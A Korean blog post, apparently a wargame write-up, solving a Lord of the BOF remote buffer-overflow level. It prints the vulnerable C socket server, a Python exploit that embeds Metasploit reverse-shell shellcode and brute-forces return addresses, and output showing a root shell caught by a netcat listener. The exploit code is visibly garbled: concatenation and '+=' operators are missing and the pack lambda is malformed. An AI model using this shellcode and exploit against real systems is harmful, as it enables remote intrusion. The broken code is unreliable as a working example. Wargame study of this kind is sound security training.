HackerSchool LOB [redhat] Level20

0x10 정보보안/0x15 System

by sweetchip 2013. 7. 14. 12:29

BOB과제로 FTZ풀다가 급생각나서 LOB도 풀어보는데 재미있다.

레벨 20에서는 remote exploit이 등장하는데 먼저 소스코드를 보면

[xavius@localhost xavius]$ cat death_knight.c

The Lord of the BOF : The Fellowship of the BOF

- dark knight

- remote BOF

#include

main()

{

char buffer[40];

int server_fd, client_fd;

struct sockaddr_in server_addr;

struct sockaddr_in client_addr;

int sin_size;

if((server_fd = socket(AF_INET, SOCK_STREAM, 0)) == -1){

perror("socket");

exit(1);

}

server_addr.sin_family = AF_INET;

server_addr.sin_port = htons(6666);

server_addr.sin_addr.s_addr = INADDR_ANY;

bzero(&(server_addr.sin_zero), 8);

if(bind(server_fd, (struct sockaddr *)&server_addr, sizeof(struct sockaddr)) == -1){

perror("bind");

exit(1);

}

if(listen(server_fd, 10) == -1){

perror("listen");

exit(1);

}

while(1) {

sin_size = sizeof(struct sockaddr_in);

if((client_fd = accept(server_fd, (struct sockaddr *)&client_addr, &sin_size)) == -1){

perror("accept");

continue;

}

if (!fork()){

send(client_fd, "Death Knight : Not even death can save you from me!\n", 52, 0);

send(client_fd, "You : ", 6, 0);

recv(client_fd, buffer, 256, 0);

close(client_fd);

break;

}

close(client_fd);

while(waitpid(-1,NULL,WNOHANG) > 0);

}

close(server_fd);

}

40바이트만큼 buffer가 있는 상태지만 256만큼 받아버려서 BOF가 발생한다.

스택의 구조를

[data...]| [buffer][sfp][ret] |[data...]

으로 예상하고 exploit을 작성했다


from socket import *
from struct import pack

p = lambda x: struct.pack(",x)

# linux/x86/shell_reverse_tcp - 95 bytes 
# Encoder: x86/shikata_ga_nai 
# VERBOSE=false, LHOST=*, LPORT=*,  
shellcode = ("\xd9\xcf\xd9\x74\x24\xf4\x5d\x33\xc9\xb1\x12\xba\x5c\xa8"  
		"\x72\xf6\x83\xed\xfc\x31\x55\x13\x03\x09\xbb\x90\x03\x80"  
		"\x60\xa3\x0f\xb1\xd5\x1f\xba\x37\x53\x7e\x8a\x51\xae\x01"  
		"\x78\xc4\x80\x3d\xb2\x76\xa9\x38\xb5\x1e\xf6\xce\xb2\x16"  
		"\x6e\x33\x3d\x89\x48\xba\xdc\x65\xf0\xec\x4f\xd6\x4e\x0f"  
		"\xf9\x39\x7d\x90\xab\xd1\x51\xbe\x38\x49\xc6\xef\xdc\xe0"  
		"\x78\x79\xc3\xa0\xd7\xf0\xe5\xf4\xd3\xcf\x66")

HOST = "192.168.0.29"
PORT = 6666

limit = 256 - 1

print len(shellcode)
print "[*] Sending Exploit Codes.."

for i in range(0xff,0x00,-1):
	for j in range(0,0xff,100):

		s = socket(AF_INET,SOCK_STREAM)
		s.connect((HOST,PORT))
		s.recv(1207)

		exploit = ""
		exploit  = "\x90"*40 # offset
		exploit  = "\x90"*4  # sfp
		exploit  = chr(j)   chr(i)   "\xff\xbf" # ret
		exploit  = "\x90"*(limit-len(shellcode)-len(exploit)) # slide
		exploit  = shellcode # shellcode

		s.send(exploit)

print "PWNED?"
s.close()

* 쉘코드는 리버스쉘이고 metasploit으로 제작되었습니다.

J:\fedora_exploit\TheLordOfTheBOF_redhat>lob20.py

[*] Sending Exploit Codes..

pwned?

C:\Users\sweetchip\Desktop>nc -lvp *

listening on [any] * ...

192.168.0.1: inverse host lookup failed: h_errno 11004: NO_DATA

connect to [192.168.0.2] from (UNKNOWN) [192.168.0.1] 1045: NO_DATA

uid=0(root) gid=0(root) euid=520(death_knight) egid=520(death_knight)

my-pass

euid = 520

g** *** ****

[death_knight@localhost death_knight]$ cat dropped_item.txt

You're so great! This is a token to the next gate.

,' `.

,' _<>_ `.

,'.-'____`-.`.

,'_.-'' ``-._`.

,',' /\ `.`.

,' /.._ O / \ O _.,\ `.

,'/ / \ ``-;.--.:-'' / \ \`.

,' : : \ /\`.,'/\ / : : `.

< <>| | O >(< ( ) >)< O | |<> >

`. : : / \/,'`.\/ \ ; ; ,'

`.\ \ /_..-:`--';-.._\ / /,'

`. \`' O \ / O `'/ ,'

`.`._ \/ _,','

`..``-.____.-'',,'

`.`-.____.-','

`. <> ,'

`. ,'

Exploit을 성공하고 root 쉘을 획득했다.

'0x10 정보보안 > 0x15 System' 카테고리의 다른 글

[Windows] Exploitable? Fuzzing을 통해 나온 크래시 분류하기 (16)	2013.09.01
JuniorCTF 2013 Level10 Write-up [exploit] (6)	2013.08.04
exploit-exercise protostar fianl00 Exploit (0)	2013.06.06
Exploit-Exercise Fusion level01 (0)	2013.06.04
Exploit-Exercise Fusion level00 (0)	2013.06.04